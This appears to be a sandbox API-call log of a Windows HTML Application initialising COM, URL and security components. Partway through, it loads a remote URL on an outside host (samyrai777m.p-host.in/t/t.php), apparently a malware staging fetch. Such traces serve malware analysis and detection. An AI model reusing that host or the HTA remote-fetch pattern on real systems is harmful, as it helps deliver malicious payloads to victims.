[0063.638] IUnknown:AddRef (This=0x7fee1044fa0) returned 0x1
[0063.638] IUnknown:Release (This=0x7fee1044fa0) returned 0x1
[0063.638] IUnknown:QueryInterface (in: This=0x7fee1044fa0, riid=0x7fefe4a8508*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x14d4d0 | out: ppvObject=0x14d4d0*=0x7fee1044fa0) returned 0x0
[0063.638] IUnknown:Release (This=0x7fee1044fa0) returned 0x1
[0063.638] IUnknown:QueryInterface (in: This=0x7fee1044fa0, riid=0x7fefe4b1978*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x14da00 | out: ppvObject=0x14da00*=0x7fee1044fb8) returned 0x0
[0063.638] IUnknown:Release (This=0x7fee1044fa0) returned 0x1
[0063.638] IUnknown:Release (This=0x7fee1044fb8) returned 0x1
[0063.638] DllGetClassObject (in: rclsid=0x319c80*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x7fefe4a8508*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x14d7c0 | out: ppv=0x14d7c0*=0x7fee1044fa0) returned 0x0
[0063.638] IUnknown:QueryInterface (in: This=0x7fee1044fa0, riid=0x7fefe4b1978*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x14da00 | out: ppvObject=0x14da00*=0x7fee1044fb8) returned 0x0
[0063.638] IUnknown:Release (This=0x7fee1044fa0) returned 0x1
[0063.638] IInternetProtocolInfo:ParseUrl (in: This=0x7fee1044fb8, pwzUrl="about:blank", ParseAction=17, dwParseFlags=0x0, pwzResult=0x31ccc0, cchResult=0xc, pcchResult=0x14da68, dwReserved=0x0 | out: pwzResult="", pcchResult=0x14da68*=0x0) returned 0x800c0011
[0063.638] IUnknown:Release (This=0x7fee1044fb8) returned 0x1
[0063.638] IUnknown:Release (This=0x30d5a0) returned 0x2
[0063.641] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x14e180, dwReserved=0x0 | out: ppSM=0x14e180*=0x324e70) returned 0x0
[0063.643] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14e2c8 | out: phkResult=0x14e2c8*=0x20c) returned 0x0
[0063.643] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14e2d0 | out: phkResult=0x14e2d0*=0x210) returned 0x0
[0063.643] RegOpenKeyExW (in: hKey=0x210, lpSubKey="FEATURE_DOCUMENT_COMPATIBLE_MODE", ulOptions=0x0, samDesired=0x1, phkResult=0x14e258 | out: phkResult=0x14e258*=0x0) returned 0x2
[0063.643] RegOpenKeyExW (in: hKey=0x20c, lpSubKey="FEATURE_DOCUMENT_COMPATIBLE_MODE", ulOptions=0x0, samDesired=0x1, phkResult=0x14e258 | out: phkResult=0x14e258*=0x0) returned 0x2
[0063.643] RegCloseKey (hKey=0x0) returned 0x6
[0063.643] RegCloseKey (hKey=0x0) returned 0x6
[0063.643] RegCloseKey (hKey=0x20c) returned 0x0
[0063.643] RegCloseKey (hKey=0x210) returned 0x0
[0063.644] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x14df80 | out: ppURI=0x14df80*=0x30d5a0) returned 0x0
[0063.647] DllGetClassObject (in: rclsid=0x319c80*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x7fefe4a8508*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x14d580 | out: ppv=0x14d580*=0x7fee1044fa0) returned 0x0
[0063.647] IUnknown:QueryInterface (in: This=0x7fee1044fa0, riid=0x7fefe4b1978*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x14d7c0 | out: ppvObject=0x14d7c0*=0x7fee1044fb8) returned 0x0
[0063.647] IUnknown:Release (This=0x7fee1044fa0) returned 0x1
[0063.647] IInternetProtocolInfo:ParseUrl (in: This=0x7fee1044fb8, pwzUrl="about:blank", ParseAction=3, dwParseFlags=0x0, pwzResult=0x31cda0, cchResult=0xc, pcchResult=0x14d800, dwReserved=0x0 | out: pwzResult="about:blank", pcchResult=0x14d800*=0xc) returned 0x0
[0063.647] IUnknown:Release (This=0x7fee1044fb8) returned 0x1
[0063.647] DllGetClassObject (in: rclsid=0x319c80*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x7fefe4a8508*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x14d580 | out: ppv=0x14d580*=0x7fee1044fa0) returned 0x0
[0063.647] IUnknown:QueryInterface (in: This=0x7fee1044fa0, riid=0x7fefe4b1978*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x14d7c0 | out: ppvObject=0x14d7c0*=0x7fee1044fb8) returned 0x0
[0063.647] IUnknown:Release (This=0x7fee1044fa0) returned 0x1
[0063.647] IInternetProtocolInfo:ParseUrl (in: This=0x7fee1044fb8, pwzUrl="about:blank", ParseAction=17, dwParseFlags=0x0, pwzResult=0x31cda0, cchResult=0xc, pcchResult=0x14d804, dwReserved=0x0 | out: pwzResult="", pcchResult=0x14d804*=0x0) returned 0x800c0011
[0063.647] IUnknown:Release (This=0x7fee1044fb8) returned 0x1
[0063.647] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0063.647] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0063.647] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0063.647] IUnknown:Release (This=0x30d5a0) returned 0x2
[0063.648] GetDC (hWnd=0x0) returned 0x530107fa
[0063.648] GetDeviceCaps (hdc=0x530107fa, index=88) returned 96
[0063.648] ReleaseDC (hWnd=0x0, hDC=0x530107fa) returned 1
[0063.648] MulDiv (nNumber=100000, nNumerator=96, nDenominator=96) returned 100000
[0063.650] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14e3b8 | out: phkResult=0x14e3b8*=0x104) returned 0x0
[0063.650] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14e3c0 | out: phkResult=0x14e3c0*=0x20c) returned 0x0
[0063.650] RegOpenKeyExW (in: hKey=0x20c, lpSubKey="FEATURE_WEBOC_DOCUMENT_ZOOM", ulOptions=0x0, samDesired=0x1, phkResult=0x14e348 | out: phkResult=0x14e348*=0x0) returned 0x2
[0063.650] RegOpenKeyExW (in: hKey=0x104, lpSubKey="FEATURE_WEBOC_DOCUMENT_ZOOM", ulOptions=0x0, samDesired=0x1, phkResult=0x14e348 | out: phkResult=0x14e348*=0x0) returned 0x2
[0063.650] RegCloseKey (hKey=0x0) returned 0x6
[0063.650] RegCloseKey (hKey=0x0) returned 0x6
[0063.650] RegCloseKey (hKey=0x104) returned 0x0
[0063.650] RegCloseKey (hKey=0x20c) returned 0x0
[0063.650] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x776e0000
[0063.650] GetProcAddress (hModule=0x776e0000, lpProcName="InitializeSRWLock") returned 0x778384f0
[0063.651] GetProcAddress (hModule=0x776e0000, lpProcName="AcquireSRWLockExclusive") returned 0x77828020
[0063.651] GetProcAddress (hModule=0x776e0000, lpProcName="AcquireSRWLockShared") returned 0x778254e0
[0063.651] GetProcAddress (hModule=0x776e0000, lpProcName="ReleaseSRWLockExclusive") returned 0x77828050
[0063.651] GetProcAddress (hModule=0x776e0000, lpProcName="ReleaseSRWLockShared") returned 0x778254b0
[0063.651] RtlInitializeConditionVariable () returned 0x778254b0
[0063.664] IUnknown_QueryService (in: punk=0x7fee10426d8, guidService=0x7fee0f20508*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x7fee0f20508*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), ppvOut=0x31d828 | out: ppvOut=0x31d828*=0x0) returned 0x80004005
[0063.664] IUnknown:QueryInterface (in: This=0x7fee10426d8, riid=0x7fefe7c08e0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x14f740 | out: ppvObject=0x14f740*=0x7fee1042700) returned 0x0
[0063.664] IServiceProvider:QueryService (in: This=0x7fee1042700, guidService=0x7fee0f20508*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x7fee0f20508*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), ppvObject=0x31d828 | out: ppvObject=0x31d828*=0x0) returned 0x80004005
[0063.664] IUnknown:Release (This=0x7fee1042700) returned 0x1
[0063.666] IInternetSecurityManager:SetSecuritySite (This=0x3212c0, pSite=0x31e1b8) returned 0x0
[0063.666] IUnknown:Release (This=0x31e1b8) returned 0x0
[0063.666] IUnknown:AddRef (This=0x31e1b8) returned 0x28
[0063.666] IUnknown:QueryInterface (in: This=0x31e1b8, riid=0x7fefe4ae970*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x14f7c0 | out: ppvObject=0x14f7c0*=0x31e1c0) returned 0x0
[0063.666] IServiceProvider:QueryService (in: This=0x31e1c0, guidService=0x7fefe4b17f0*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x7fefe4b17f0*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x321308 | out: ppvObject=0x321308*=0x0) returned 0x80004002
[0063.666] IServiceProvider:QueryService (in: This=0x31e1c0, guidService=0x7fefe4b18b0*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x7fefe4b18b0*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x321300 | out: ppvObject=0x321300*=0x0) returned 0x80004002
[0063.666] IServiceProvider:QueryService (in: This=0x31e1c0, guidService=0x7fefe4ae0b0*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7fefe4ae0b0*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x3212f8 | out: ppvObject=0x3212f8*=0x7fee1042708) returned 0x0
[0063.666] IUnknown:Release (This=0x31e1c0) returned 0x0
[0063.666] CoTaskMemAlloc (cb=0x6d) returned 0x2f5340
[0063.666] CoTaskMemAlloc (cb=0x9) returned 0x31cde0
[0063.669] StrChrW (lpStart="HTA", wMatch=0x3b) returned 0x0
[0063.677] IsCharSpaceW (wch=0x48) returned 0
[0063.677] IsCharAlphaNumericW (ch=0x5c) returned 0
[0063.677] IsCharSpaceW (wch=0x5c) returned 0
[0063.678] IsCharSpaceW (wch=0x41) returned 0
[0063.678] IsCharAlphaNumericW (ch=0x20) returned 0
[0063.678] IsCharSpaceW (wch=0x20) returned 1
[0063.678] IsCharSpaceW (wch=0x7b) returned 0
[0063.679] IsCharSpaceW (wch=0x20) returned 1
[0063.679] IsCharAlphaNumericW (ch=0x7b) returned 0
[0063.679] IsCharSpaceW (wch=0x62) returned 0
[0063.679] IsCharAlphaNumericW (ch=0x3a) returned 0
[0063.679] IsCharSpaceW (wch=0x3a) returned 0
[0063.681] IsCharAlphaNumericW (ch=0x3a) returned 0
[0063.681] IsCharSpaceW (wch=0x75) returned 0
[0063.681] IsCharAlphaNumericW (ch=0x28) returned 0
[0063.681] IsCharSpaceW (wch=0x28) returned 0
[0063.681] IsCharAlphaNumericW (ch=0x28) returned 0
[0063.681] IsCharSpaceW (wch=0x23) returned 0
[0063.681] IsCharSpaceW (wch=0x23) returned 0
[0063.681] IsCharSpaceW (wch=0x7d) returned 0
[0063.681] IsCharAlphaNumericW (ch=0x7d) returned 0
[0063.681] IsCharSpaceW (wch=0x29) returned 0
[0063.682] IsCharSpaceW (wch=0x75) returned 0
[0063.683] IsCharSpaceW (wch=0x75) returned 0
[0063.683] IsCharSpaceW (wch=0x29) returned 0
[0063.683] CoTaskMemFree (pv=0x2f5340)
[0063.683] CoTaskMemFree (pv=0x31cde0)
[0063.683] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x7fefde70000
[0063.684] GetProcAddress (hModule=0x7fefde70000, lpProcName=0x6) returned 0x7fefde71320
[0063.684] StrCmpCW (pszStr1="Software\\Microsoft\\Internet Explorer", pszStr2="Software\\Microsoft\\Windows Mail\\Trident") returned -14
[0063.684] IsOS (dwOS=0x25) returned 1
[0063.684] GetSysColor (nIndex=26) returned 0xcc6600
[0063.684] IsOS (dwOS=0x25) returned 1
[0063.684] GetSysColor (nIndex=5) returned 0xffffff
[0063.684] GetSysColor (nIndex=8) returned 0x0
[0063.689] wcstol (in: _String="0,0,255", _EndPtr=0x14e310, _Radix=10 | out: _EndPtr=0x14e310*=",0,255") returned 0
[0063.689] wcstol (in: _String="0,255", _EndPtr=0x14e310, _Radix=10 | out: _EndPtr=0x14e310*=",255") returned 0
[0063.689] wcstol (in: _String="255", _EndPtr=0x14e310, _Radix=10 | out: _EndPtr=0x14e310*="") returned 255
[0063.689] wcstol (in: _String="128,0,128", _EndPtr=0x14e310, _Radix=10 | out: _EndPtr=0x14e310*=",0,128") returned 128
[0063.689] wcstol (in: _String="0,128", _EndPtr=0x14e310, _Radix=10 | out: _EndPtr=0x14e310*=",128") returned 0
[0063.689] wcstol (in: _String="128", _EndPtr=0x14e310, _Radix=10 | out: _EndPtr=0x14e310*="") returned 128
[0063.690] GetModuleHandleW (lpModuleName="EXPLORER.EXE") returned 0x0
[0063.690] GetModuleHandleW (lpModuleName="IEXPLORE.EXE") returned 0x0
[0063.690] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\PageSetup", ulOptions=0x0, samDesired=0x20019, phkResult=0x14f418 | out: phkResult=0x14f418*=0x8c) returned 0x0
[0063.690] SHGetValueW (in: hkey=0x8c, pszSubKey=0x0, pszValue="Print_Background", pdwType=0x0, pvData=0x14f420, pcbData=0x14f410*=0xa | out: pdwType=0x0, pvData=0x14f420, pcbData=0x14f410*=0xa) returned 0x2
[0063.690] RegCloseKey (hKey=0x8c) returned 0x0
[0063.697] GetAcceptLanguagesW () returned 0x0
[0063.697] GetClassNameW (in: hWnd=0x10200, lpClassName=0x14f790, nMaxCount=10 | out: lpClassName="HTML Appl") returned 9
[0063.697] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="HTML Appl", cchCount1=9, lpString2="HH Parent", cchCount2=9) returned 3
[0063.697] GetParent (hWnd=0x10200) returned 0x101fc
[0063.697] GetClassNameW (in: hWnd=0x101fc, lpClassName=0x14f790, nMaxCount=10 | out: lpClassName="HTML Appl") returned 9
[0063.697] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="HTML Appl", cchCount1=9, lpString2="HH Parent", cchCount2=9) returned 3
[0063.697] GetParent (hWnd=0x101fc) returned 0x0
[0063.700] IMoniker:GetDisplayName (in: This=0x2f5140, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0x14f8a8 | out: ppszDisplayName=0x14f8a8*="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 0x0
[0063.700] IUnknown:QueryInterface (in: This=0x2f5140, riid=0x7fee0f20578*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x14f710 | out: ppvObject=0x14f710*=0x2f5158) returned 0x0
[0063.700] IUriContainer:GetIUri (in: This=0x2f5158, ppIUri=0x14f760 | out: ppIUri=0x14f760*=0x30e180) returned 0x0
[0063.700] IUnknown:Release (This=0x2f5158) returned 0x1
[0063.700] IUnknown:AddRef (This=0x2f5140) returned 0x2
[0063.700] IUnknown:AddRef (This=0x30e180) returned 0x5
[0063.700] IMoniker:GetDisplayName (in: This=0x2f5140, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0x14f510 | out: ppszDisplayName=0x14f510*="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 0x0
[0063.700] UrlGetLocationW (psz1="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 0x0
[0063.700] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="http://www.samyrai777m.p-host.in/t/t.php?thread=0", ppmk=0x14f4a0*=0x0, dwFlags=0x1 | out: ppmk=0x14f4a0*=0x2f5340) returned 0x0
[0063.700] CreateUri (in: pwzURI="http://www.samyrai777m.p-host.in/t/t.php?thread=0", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x14f480 | out: ppURI=0x14f480*=0x30e180) returned 0x0
[0063.700] IUri:GetScheme (in: This=0x30e180, pdwScheme=0x14f3c0 | out: pdwScheme=0x14f3c0*=0x2) returned 0x0
[0063.700] CoInternetIsFeatureEnabled (FeatureEntry=0x1, dwFlags=0x2) returned 0x1
[0063.700] IUnknown:AddRef (This=0x30e180) returned 0x9
[0063.700] IUri:GetAbsoluteUri (in: This=0x30e180, pbstrAbsoluteUri=0x31f2a0 | out: pbstrAbsoluteUri=0x31f2a0*="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 0x0
[0063.700] IUnknown:Release (This=0x30e180) returned 0x8
[0063.700] IUnknown:AddRef (This=0x2f5340) returned 0x2
[0063.700] IUnknown:Release (This=0x2f5340) returned 0x1
[0063.701] IUnknown:AddRef (This=0x2f5140) returned 0x3
[0063.701] IUnknown:Release (This=0x2f5340) returned 0x0
[0063.701] IUnknown:AddRef (This=0x2f5140) returned 0x4
[0063.701] IUnknown:QueryInterface (in: This=0x30e180, riid=0x7fee0f6ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14f0e0 | out: ppvObject=0x14f0e0*=0x30e180) returned 0x0
[0063.701] IUnknown:Release (This=0x30e180) returned 0x6
[0063.701] IUnknown:AddRef (This=0x30e180) returned 0x7
[0063.701] IUnknown:QueryInterface (in: This=0x2f5140, riid=0x7fee0f20578*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x14f080 | out: ppvObject=0x14f080*=0x2f5158) returned 0x0
[0063.701] IUriContainer:GetIUri (in: This=0x2f5158, ppIUri=0x14f120 | out: ppIUri=0x14f120*=0x30e180) returned 0x0
[0063.701] IUnknown:Release (This=0x2f5158) returned 0x4
[0063.701] IUnknown:AddRef (This=0x2f5140) returned 0x5
[0063.701] IUnknown:Release (This=0x2f5140) returned 0x4
[0063.701] IUnknown:AddRef (This=0x30e180) returned 0x9
[0063.701] IUnknown:QueryInterface (in: This=0x30e180, riid=0x7fee0f6ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14f0e0 | out: ppvObject=0x14f0e0*=0x30e180) returned 0x0
[0063.701] IUnknown:Release (This=0x30e180) returned 0x9
[0063.701] IUnknown:AddRef (This=0x30e180) returned 0xa
[0063.701] IUri:GetScheme (in: This=0x30e180, pdwScheme=0x14f0e0 | out: pdwScheme=0x14f0e0*=0x2) returned 0x0
[0063.701] GetCurrentProcessId () returned 0xbc8
[0063.701] IUnknown:QueryInterface (in: This=0x30e180, riid=0x7fee0f6ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14f0e0 | out: ppvObject=0x14f0e0*=0x30e180) returned 0x0
[0063.701] IUnknown:Release (This=0x30e180) returned 0xa
[0063.701] IUnknown:AddRef (This=0x30e180) returned 0xb
[0063.702] IUri:GetScheme (in: This=0x30e180, pdwScheme=0x14f0b0 | out: pdwScheme=0x14f0b0*=0x2) returned 0x0
[0063.702] IUri:GetAbsoluteUri (in: This=0x30e180, pbstrAbsoluteUri=0x14f0c0 | out: pbstrAbsoluteUri=0x14f0c0*="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 0x0
[0063.702] GetProcAddress (hModule=0x7fefde70000, lpProcName=0x7) returned 0x7fefde71020
[0063.702] SysStringLen (param_1="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 0x31
[0063.702] CreateUri (in: pwzURI="http://www.samyrai777m.p-host.in/t/t.php?thread=0", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x14f4c0 | out: ppURI=0x14f4c0*=0x30e180) returned 0x0
[0063.702] IUnknown:Release (This=0x30e180) returned 0xb
[0063.702] IUri:GetScheme (in: This=0x30e180, pdwScheme=0x14f050 | out: pdwScheme=0x14f050*=0x2) returned 0x0
[0063.702] IUnknown:AddRef (This=0x30e180) returned 0xc
[0063.702] IUri:GetPropertyDWORD (in: This=0x30e180, uriProp=0x11, pdwProperty=0x14ee08, dwFlags=0x0 | out: pdwProperty=0x14ee08*=0x2) returned 0x0
[0063.702] IInternetSecurityManager:GetSecurityId (in: This=0x3212c0, pwszUrl="http://www.samyrai777m.p-host.in/t/t.php?thread=0", pbSecurityId=0x14eec0, pcbSecurityId=0x14eeb0*=0x200, dwReserved=0x0 | out: pbSecurityId=0x14eec0*=0x68, pcbSecurityId=0x14eeb0*=0x22) returned 0x0
[0063.820] IUnknown:Release (This=0x30e180) returned 0xb
[0063.820] ParseURLW (in: pcszURL="http://www.samyrai777m.p-host.in/t/t.php?thread=0", ppu=0x14f050 | out: ppu=0x14f050) returned 0x0
[0063.820] GetDC (hWnd=0x0) returned 0x530107fa
[0063.820] CreateCompatibleBitmap (hdc=0x530107fa, cx=1, cy=1) returned 0x1e0508c3
[0063.820] GetDIBits (in: hdc=0x530107fa, hbm=0x1e0508c3, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x14ec00, usage=0x0 | out: lpvBits=0x0, lpbmi=0x14ec00) returned 1
[0063.820] GetDIBits (in: hdc=0x530107fa, hbm=0x1e0508c3, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x14ec00, usage=0x0 | out: lpvBits=0x0, lpbmi=0x14ec00) returned 1
[0063.820] DeleteObject (ho=0x1e0508c3) returned 1
[0063.820] GetSysColor (nIndex=0) returned 0xc8c8c8
[0063.820] GetSysColor (nIndex=1) returned 0x0
[0063.820] GetSysColor (nIndex=2) returned 0xd1b499
[0063.820] GetSysColor (nIndex=3) returned 0xdbcdbf
[0063.820] GetSysColor (nIndex=4) returned 0xf0f0f0
[0063.820] GetSysColor (nIndex=5) returned 0xffffff
[0063.820] GetSysColor (nIndex=6) returned 0x646464
[0063.820] GetSysColor (nIndex=7) returned 0x0
[0063.820] GetSysColor (nIndex=8) returned 0x0
[0063.820] GetSysColor (nIndex=9) returned 0x0
[0063.821] GetSysColor (nIndex=10) returned 0xb4b4b4
[0063.821] GetSysColor (nIndex=11) returned 0xfcf7f4
[0063.821] GetSysColor (nIndex=12) returned 0xababab
[0063.821] GetSysColor (nIndex=13) returned 0xff9933
[0063.821] GetSysColor (nIndex=14) returned 0xffffff
[0063.821] GetSysColor (nIndex=15) returned 0xf0f0f0
[0063.821] GetSysColor (nIndex=16) returned 0xa0a0a0
[0063.821] GetSysColor (nIndex=17) returned 0x6d6d6d
[0063.821] GetSysColor (nIndex=18) returned 0x0
[0063.821] GetSysColor (nIndex=19) returned 0x544e43
[0063.821] GetSysColor (nIndex=20) returned 0xffffff
[0063.821] GetSysColor (nIndex=21) returned 0x696969
[0063.821] GetSysColor (nIndex=22) returned 0xe3e3e3
[0063.821] GetSysColor (nIndex=23) returned 0x0
[0063.821] GetSysColor (nIndex=24) returned 0xe1ffff
[0063.821] GetSysColor (nIndex=25) returned 0x0
[0063.821] GetSysColor (nIndex=26) returned 0xcc6600
[0063.821] GetSysColor (nIndex=27) returned 0xead1b9
[0063.821] GetSysColor (nIndex=28) returned 0xf2e4d7
[0063.821] GetSysColor (nIndex=29) returned 0xff9933
[0063.821] GetSysColor (nIndex=30) returned 0xf0f0f0
[0063.821] GetSysColor (nIndex=31) returned 0x0
[0063.821] GetSysColor (nIndex=32) returned 0x0
[0063.821] GetSysColor (nIndex=33) returned 0x0
[0063.821] GetSysColor (nIndex=34) returned 0x0
[0063.821] GetSysColor (nIndex=35) returned 0x0
[0063.821] GetSysColor (nIndex=36) returned 0x0
[0063.821] GetSysColor (nIndex=37) returned 0x0
[0063.821] GetSysColor (nIndex=38) returned 0x0
[0063.821] GetSysColor (nIndex=39) returned 0x0
[0063.821] GetSysColor (nIndex=40) returned 0x0
[0063.821] GetSysColor (nIndex=41) returned 0x0
[0063.821] GetSysColor (nIndex=42) returned 0x0
[0063.821] GetSysColor (nIndex=43) returned 0x0
[0063.821] GetSysColor (nIndex=44) returned 0x0
[0063.821] GetSysColor (nIndex=45) returned 0x0
[0063.821] GetSysColor (nIndex=46) returned 0x0
[0063.821] GetSysColor (nIndex=47) returned 0x0
[0063.821] GetSysColor (nIndex=48) returned 0x0
[0063.821] GetSysColor (nIndex=49) returned 0x0
[0063.821] GetSysColor (nIndex=50) returned 0x0
[0063.821] GetSysColor (nIndex=51) returned 0x0
[0063.821] GetSysColor (nIndex=52) returned 0x0
[0063.821] GetSysColor (nIndex=53) returned 0x0
[0063.821] GetSysColor (nIndex=54) returned 0x0
[0063.821] GetSysColor (nIndex=55) returned 0x0
[0063.821] GetSysColor (nIndex=56) returned 0x0
[0063.821] GetSysColor (nIndex=57) returned 0x0
[0063.821] GetSysColor (nIndex=58) returned 0x0
[0063.821] GetSysColor (nIndex=59) returned 0x0
[0063.821] GetSysColor (nIndex=60) returned 0x0
[0063.821] GetSysColor (nIndex=61) returned 0x0
[0063.821] GetSysColor (nIndex=62) returned 0x0
[0063.821] GetSysColor (nIndex=63) returned 0x0
[0063.821] GetDeviceCaps (hdc=0x530107fa, index=38) returned 32409
[0063.821] ReleaseDC (hWnd=0x0, hDC=0x530107fa) returned 1
